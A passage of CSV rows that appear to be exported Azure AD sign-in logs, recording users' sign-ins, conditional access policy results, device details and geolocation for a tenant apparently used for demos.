'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",success,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",f2b904ff-af10-49b8-9333-56c3f8b43e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f2b904ff-af10-49b8-9333-56c3f8b43e00,SigninLogs,Sucess,32.32146072,34.85319901
+519,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:18.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4ba8b789-61c2-4059-8ea6-5597604fb15f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-059334701900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,80d584c4-dd35-4dcb-882c-059334701900,SigninLogs,Sucess,33.7984581,-84.38828278
+520,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:01.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cb8c303e-0aa3-4fdd-8dab-6a847c816bac,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",a9f59943-bd83-455b-86cd-4cf1e61c1b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,a9f59943-bd83-455b-86cd-4cf1e61c1b00,SigninLogs,Sucess,50.6406517,5.572050095
+521,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,06:45.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,363ef126-f58f-4890-9cd7-648678b65a88,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 19:06,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",4f13b3ca-ea54-49f2-abfb-28fd437d0100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,4f13b3ca-ea54-49f2-abfb-28fd437d0100,SigninLogs,Sucess,32.32146072,34.85319901
+522,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:03,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",ada993e9-7277-4e26-b6a7-9ce229760200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ada993e9-7277-4e26-b6a7-9ce229760200,SigninLogs,Sucess,40.75891113,-73.97901917
+523,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:55.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,8f391060-6901-46e8-9a04-8e8deb5a0bf9,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e950640f-89f2-49b5-9956-82784edf1c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e950640f-89f2-49b5-9956-82784edf1c00,SigninLogs,Failed,50.6406517,5.572050095
+524,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,06:45.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,363ef126-f58f-4890-9cd7-648678b65a88,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 19:06,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",4f13b3ca-ea54-49f2-abfb-28fd437d0100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,4f13b3ca-ea54-49f2-abfb-28fd437d0100,SigninLogs,Sucess,32.32146072,34.85319901
+525,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:33.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d16e438f-401e-426d-b1da-f1a63c1fce4c,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:16,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",6ceeede3-8a52-4ae6-806f-4d4772d30000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,6ceeede3-8a52-4ae6-806f-4d4772d30000,SigninLogs,Sucess,32.32146072,34.85319901
